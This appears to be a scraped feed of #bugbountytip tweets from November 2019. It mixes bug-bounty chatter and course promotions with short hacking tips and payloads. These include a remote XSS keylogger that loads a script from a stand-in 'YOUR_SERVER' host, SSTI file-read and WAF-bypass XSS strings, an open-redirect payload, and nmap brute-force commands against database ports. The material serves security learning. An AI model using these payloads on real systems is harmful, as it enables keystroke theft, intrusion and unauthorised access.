18 Yes I earned $3180. Tools : Sub Scanner : https://t.co/LegySAU3sZ Dir Scanner : https://t.co/1L6MutcaEc Git Dumper : https://t.co/IOsHlTWCP2 #BugBounty #bugbountytips #bugbountytip #whitehat #infosec https://t.co/6Qy1JEiDWM
Vikash Chaudhary
@OffensiveHunter


2019-11-21 05:31:42
2 #BugBountyTip completes the first checklist that I gave it to you yesterday, now move to on these vulnerabilities spend some time to read about these topics. if you want to learn live bug bounty hunting you can subscribe to my second course i.e Offensive… https://t.co/ji3V0Sxi5a
Mourad
@SecuAudit


2019-11-20 22:27:32
0 The worst Bug Bounty program : You spend your holidays trying to help them to secure their online business . after 45days when you ask for an update they just get worse and treat you like shit in return ,Bug Hunters have no value in this chain #bugbountytip #BugBounty #pentesting
florens
@florens25301329


2019-11-20 20:18:04
2 Finally got the last bit working so i can finish the practical for XXE!! Notes will be available today/tomorrow! #bugbountytip #Bugbounty
itsmenaga
@nagarockshard


2019-11-20 17:17:24
0 After seeing *.domain.com ...Recon Script Pop-ups 😛😂 #BadBugBountyPickUpLines #bugbountytip
Yadhavi
@PrincessYadhavi


2019-11-20 16:57:27
0 As Defcon 27 videos uploaded to youtube, which talks are must watch for bug bounty hunters? #defcon #bugbounty #bugbountytip #bugbountytips
Ali Tütüncü
@alicanact60


2019-11-20 16:27:34
0 Hi there! I will share a vulnerability which I found on Facebook. PoC video or Write up? Which one do you prefer? The survey will be available for 2 days and then, I will publish it. Select one! #BugBounty #bugbountytips #bugbountytip
Daher Mohamed
@DaherMohamed4


2019-11-20 15:37:46
0 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/uv11CIACuA #BugBounty #bugbountytips #bugbountytip
RIPS Technologies
@ripstech


2019-11-20 15:36:25
2 Find out how Simon found 5 #WordPress core 0days, in our #security whitepaper: ->https://t.co/U7VCsBglqR #bugbounty #bugbountytip #bugbountytips #AppSec https://t.co/fNU3DID063
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:18:12
0 Get Cyber Security and Technology Internship with HACKDOOR Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/KskyHzVwvW
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:10:22
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/u2LdRIokeL
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:08:49
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Bh0bARIGBh
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:06:58
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mCZqeZB8YT
National Cyber Security Services
@NationalCyberS1


2019-11-20 12:40:53
2 Configuring Frida with #BurpSuite and #Genymotion to #bypass #Android #SSL Pinning #LINK :- https://t.co/jLWK2f7dx6 #cybersecurity #Pentesting #pentest #hacking #bugbountytips #bugbounty #bugbountytip https://t.co/JIZt1QUzHi
x1m
@x1m_martijn


2019-11-20 09:23:49
0 Someone else is using my xsshunter payload :p I don't mind heheheh #bugbountytip
Vikash Chaudhary
@OffensiveHunter


2019-11-20 03:49:31
2 #BugBountyTip if you are not getting bounty then hunt these bugs on any program first , you will surely get. it's very easy to hunt these bugs. Regards! #Vikash #Chaudhary CEO & Founder (#HackersEra #Cyber #Security #Consultancy & #Training PVT LTD) mail… https://t.co/NHBnVkBMWH
YogoshaOfficial
@YogoshaOfficial


2019-11-19 16:08:30
10 [#bugbountytip] : If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP ,X-Forwarded-For , X-Remote-IP , X-Remote-Addr @TnMch_
Mantis
@MantisSTS


2019-11-19 15:07:52
2 What word lists do you have most success with to find admin panels? RT for reach! #BugBounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-19 14:11:17
2 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting https://t.co/AjSRBqt57p
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-19 14:00:03
3 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #Pentesting https://t.co/0wdvBhdOHw
bugbountytip
@a_l_e_r_t_1_


2019-11-19 11:16:24
1 Stored XSS on gitlab - 2 #bugbountytips #bugbountytip https://t.co/eaW3avmcpK
Raad Haddad
@raadfhaddad


2019-11-19 07:17:36
2 Read headlines of the company's policies, make sure they implement it correctly, especially when it comes to insecure data storage. I found something related to this in Facebook last year! And yes, i got rewarded for my finding. #bugbountytip #bugbounty #security
_ABDOUL_GAFFHAR_
@mrgaphy


2019-11-19 06:21:42
0 My next open source project I want to make an automated tool that will search leak credentials in log and config files. I always seem to find exposed credentials in log or configuration files. #bugbountytips #BugBounty #bugbountytip #osint #pentest #webappsec #redteam #infosec
void
@gowridash


2019-11-19 04:57:35
0 @facebook Still Notification #bug #defect is not fixed? During shifting Mobile data/Wi-Fi already read/seen posts are showing as new ones #Android9 Is it so difficult to fix this #issue #bugbountytip
tololovejoi
@tolo7010


2019-11-18 23:01:07
0 1% of new bug bounty hunters ask for knowledge, 99% of them ask for motivation #bugbounty #bugbountytip #infosec #hacking
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-11-18 22:35:10
0 #bugbountytip #bugbountytios all of bug hunters writes try to understand web app. Writes some payloads :) But no one write about detection methodology :) Try to understand every vuln and what you need search in response body after sending payload.
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-18 22:14:56
1 Remember that *pht* files can be used to execute PHP code. Old #bugbountytip
m0z
@LooseSecurity


2019-11-18 18:41:49
6 I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountytips #BugBounty #bugbountytip payload not by me
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 18:07:09
0 [Tutorial] My Tutorial collection for SHELLING+ROOTING WEBSITES ----- COMMENT HERE and will share the link ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 17:56:50
0 Hacking Windows PC using Metasploit u TORRENT Tutorial by Hackdoor on WebDav_dll Hijacking https://t.co/yznzTvdCrC Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/OT1MPRtl86
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 17:40:28
1 [[[FREE]]] Biggest Repository of Ebooks (hacking, penetration testing, tool , programming and more) ! Comment Here and I will share the Link with you -- Limited Users only !! #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Halil AHMAD
@Halilahmadd


2019-11-18 11:33:37
0 Second Time Hall Of Fame #BugBounty #XSS #BugBountyTip #infosec https://t.co/Q0WGIKRgpt
HamdiSevben
@HmdSvbn


2019-11-18 11:08:14
0 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/fhokFhyIyj -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/C56oHA2Aua -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/RmE8h4eP6R #bugbountytip #Hacking #redteam
Ali Tütüncü
@alicanact60


2019-11-18 10:34:55
2 Last night, worked about 1 hour and got one triaged report. Waiting payment. @Hacker0x01 #BugBounty #bugbountyips #bugbountytip 1. Always look at all request. Maybe you can find a redirect parameter. 2. This payload can be useful for open redirects: //[email protected] https://t.co/VsUp6O1vCt
Ammar Amer🇸🇾
@cry__pto


2019-11-18 09:54:28
5 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/OOd6Z3Qc1M -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/HoinO16IyM -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/Lz7WTH1mzY #bugbountytip #Hacking #redteam
OCK le Fécond
@OscLFecond


2019-11-18 07:36:58
1 How to Bypass SSL Pinning on Android : -Root your devices -Install your mitm cert -Move it from data/misc/user/0/cacerts-added -To /system/etc/security/cacerts -No need Frida - Enjoy <3 #AndroidSecurity #MobileSecurity #bugbountytip #bugbountytips
Shantanu Kulkarni
@Iamshantanukul


2019-11-18 05:51:21
0 If a failed login caused application to send a warning email to user , any user data incorporated into the email may need to be checked for SMTP injection attacks. #bugbountytip #hackerone #bugcrowd #bughunting #bugbounty #pentesting #hacking #cybersecurity #bugbountytips
darkmage
@therealdarkmage


2019-11-18 05:35:52
0 Aw fooey, my most recent submission to @Bugcrowd was marked as "duplicate"...meaning it was still a legit concern! Heck yeah, I am learning and leveling up! - It was an open redirect on a website where I overcame a whitelist using a double-redirect 😎 #bugbounty #bugbountytip
Imran nissar
@Imrannissar3


2019-11-18 05:18:49
4 How bash can be used for automation #bugbounty #bugbountytip https://t.co/heUev6rsuI
m0z
@LooseSecurity


2019-11-17 20:46:27
0 Always remember to test for SSTI (Server-Side Template Injection). Test for it the same way you would for XSS. A few simple payloads like {{7*7}} and if they get replaced by '49' then you've just found a high/critical vulnerability. You need to get a PoC though! #bugbountytip
Halil AHMAD
@Halilahmadd


2019-11-17 20:16:17
5 REMOTE XSS KEYLOGGER Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
ghostlulz
@ghostlulz1337


2019-11-17 18:37:46
7 I always seem to find exposed credentials in log or configuration files. These are easy wins that take 10 seconds to find. More info on my blog: https://t.co/Kft6p37wJM #bugbountytips #BugBounty #bugbountytip #osint #pentest #appsec #redteam #infosec #pentesting #logs #config https://t.co/Vf4AJs2sn7
A hacker's life
@Unknownuser1806


2019-11-17 12:12:55
0 STEALING $10,000 YAHOO COOKIES! https://t.co/PSImiH4oNc JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF: https://t.co/IpzdET7XVb #bugbounty,#bugbountytip,#cybersecurity,#hacking,#infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-17 10:30:09
2 Less than 1$... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AaUIgsgeiM
sagar yadav
@sagaryadav8742


2019-11-17 04:01:58
0 Fun time with @stokfredrik ✌️ and @sechunt3r in #bsidesahmedabad #bugbountytip #bugbounty #bughunting #bugcrowd #cobalt #nullcon #hackerone #Intel #BountyHunter #bounty #secure #zerocopter #happy #sagaryadav8742 https://t.co/vzkOVrKygS
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-17 02:38:05
0 #bugbountytip Always try to access the localStorage when you get an XSS vulnerability. Just managed to retrieve the JWT tokens and user PII information stored on localStorage.
Gillis Jones
@Gillis57


2019-11-17 00:29:13
0 #bugbountytip If you're using a shared environment, and see someone else's injections are messing up the environment for other testers- take the 5 minutes necessary to try to clean up after the other tester that don't respect you enough to do the same.
Ammar Amer🇸🇾
@cry__pto


2019-11-16 23:00:56
6 -1-Recon Everything.pdf: https://t.co/mRJV7fnMQg -2-Open Source Web Reconnaissance with Recon-ng.pdf: https://t.co/V1mV1NNzTB -3-12 OSINT Resources For E-mail Addresses.pdf: https://t.co/EgR3LoHoAm -4-OSINT.pdf: https://t.co/wDNvAWXATu #OSINT #bugbountytip #redteam #Pentesting
tololovejoi
@tolo7010


2019-11-16 20:55:10
3 Bug bounty is not possible if there is no publicly disclosed reports at @Hacker0x01 #bugbounty #bugbountytip #infosec #hacking
healthyoutlet
@healthyoutlet


2019-11-16 19:27:50
0 If you're writing cli tools that people will be using in bash, consider sending all your banners and verbose output to stderr so that the main output can be cleanly piped into other tools. In python you can use sys.stderr.write() #bugbountytip
swordfish
@swordfi96641916


2019-11-16 19:05:46
0 Response: Cannot GET / .. tried all the HTTP Request headers. Any tips on what's next? #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:41:28
0 site:"https://t.co/XdC6eMbugO" pdf -- High level information disclosure !!! User's phone numbers, addresses .... #bugbountytips #bugbountytip https://t.co/7qG4z5s7CZ
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:37:12
1 Less than 1$...(Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/Dq4zebkM4o
Berk Bulan
@berk_bulan


2019-11-16 14:56:09
0 Dns Zone Transfer script #BugBounty #bugbountytip #bugbountytips https://t.co/aKUoARVYQ7
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-16 14:32:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/nbOwGUl1dF
Hussein Daher
@HusseiN98D


2019-11-16 12:42:59
9 To everyone who has been following me, you know I was taking a #bugbounty challenge: 30days $30k Started 20/10. Some bugs still unpaid. I've failed. Still 4 more days to go to complete but I'll be stopping here, I feel really tired. #bugbountytip #bugbountytips #infosec #pentest https://t.co/VRoYeMrxuo
Elsadat
@M0_SADAT


2019-11-16 10:57:28
0 Read THE JS FILES #bugbountytip
Zero Xyele
@zeroxyele


2019-11-16 08:19:05
3 Simple Python Script for Host Header Redirection Attack [Multithreaded] https://t.co/LIHgGibs5Z I was awarded 150$ in ten minutes by using that tool 😎 #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101
evryd4y
@evryd4y


2019-11-16 05:56:12
1 Handy for passive enum https://t.co/G8fYKfqLTG #bugbountytip
Ashish Kunwar
@D0rkerDevil


2019-11-16 02:07:43
0 @TakSec Param miner extension can find this. :) #bugbountytip
Gillis Jones
@Gillis57


2019-11-15 23:40:15
0 #bugbountytip If you're using a shared environment with other testers. The rules are very similar to hiking. #leavenotrace- leave the environment like you found it. If you leave damn injections all over the place rendering it unusable, you're an asshole.
Hussein Daher
@HusseiN98D


2019-11-15 20:43:37
2 So today I've found an SQLi in a cookie. Many people only stick to parameters. Test cookies too! #bugbounty #bugbountytips #bugbountytip
Sagar Tanur
@Sagarvd01


2019-11-15 15:50:12
1 Here's a write up of how I could've accessed sensitive PII and private data of tens of thousands of Indians. https://t.co/uby8wggKPx #bugbounty #bugbountytips #BugBountyTip #hacking #infosec #writeup
Halil AHMAD
@Halilahmadd


2019-11-15 15:33:54
0 XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-15 13:55:48
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #bugbountytip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #bugbountytips https://t.co/np0PsJg3GY
Ammar Amer🇸🇾
@cry__pto


2019-11-15 12:38:47
8 -Brute forcing MySQL passwords: nmap -p3306 --script mysql-brute xx.xx.xx.xx -Brute forcing MS SQL passwords: nmap -p1433 --script ms-sql-brute xx.xx.xx.xx -Brute forcing Redis passwords: nmap -p6379 --script redis-brute xx.xx.xx.xx #nmap #hacking #Pentesting #BugBountyTip
Pascal S
@PascalSec


2019-11-15 12:22:39
0 [1/2] #BugBountyTip So this is a pretty basic one but I happen to forget about it over and over again. Before starting a new pentest engagement, clear all your cookies and browser cache. Happened to me many times before that I was asking myself what a specific cookie was for...
Ammar Amer🇸🇾
@cry__pto


2019-11-15 11:51:49
6 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -XSS via HTTP Headers.pdf: https://t.co/jiQJnioGwt -SQL Injection & XSS Playground.pdf: https://t.co/9QZCtkFcx7 -XSS Exploitation in DVWA (Bypass All Security).pdf: https://t.co/dzwO0TwHCF #bugbountytip #xss #Hacking
Elsadat
@M0_SADAT


2019-11-15 10:18:09
2 Finally✌️Acknowledged by @BMW Security Team for 2019 after finding bug in the main domain ;) #bugbountytip ? 1-There is something left for you 2-Always try to Escalate everything you find! 3-NEVER GIVE UP HOF Link:https://t.co/RdsatALn39 (Ahmed Elsadat) #HOF #BugBounty #infosec https://t.co/otgetMsWC0
bugbountytip
@a_l_e_r_t_1_


2019-11-15 08:51:29
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/e5k6XeQeK2
Ammar Amer🇸🇾
@cry__pto


2019-11-15 02:35:29
7 -Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data.pdf: https://t.co/hM7HIZM56f -Pentesting Cheatsheet.pdf: https://t.co/tGxEQsqiQO -Windows Userland Persistence Fundamentals.pdf: https://t.co/uB0pSeXDP3 #PenTest #OSINT #bugbountytip #Hacking #infosec
Ammar Amer🇸🇾
@cry__pto


2019-11-14 23:24:33
4 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -Top GitHub Dorks and Tools: https://t.co/hM7HIZM56f -Pentesting Cheatsheet: https://t.co/zFwYAhCAba -Pentesting Cheatsheet2.pdf: https://t.co/34YEhESX58 -Pentesting Cheatsheets.pdf: https://t.co/tGxEQsqiQO #BugBountyTip
Sagar Tanur
@Sagarvd01


2019-11-14 17:02:57
0 A write up on how I was able to take over 4 tabs in Facebook's own Facebook pages. https://t.co/gmwro4xl5T #bugbounty #bugbountytips #BugBountyTip #writeup @Hacker0x01 @Bugcrowd
yourXss
@yourXss


2019-11-14 16:20:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal…
YogoshaOfficial
@YogoshaOfficial


2019-11-14 13:33:08
7 [#Bugbountytip] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
Halil AHMAD
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
yourXss
@yourXss


2019-11-14 04:10:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal…
bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 onliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Noman | نعمان | नोमान
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn ®
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer🇸🇾
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming 👁️
Halil AHMAD
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:35:46
5 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ZTpv2Gq4ux
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:32:05
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/fzDOZJDHd6
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:30:38
1 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/jotHFAux1f
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
Halil AHMAD
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! ๐Ÿ‘€#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
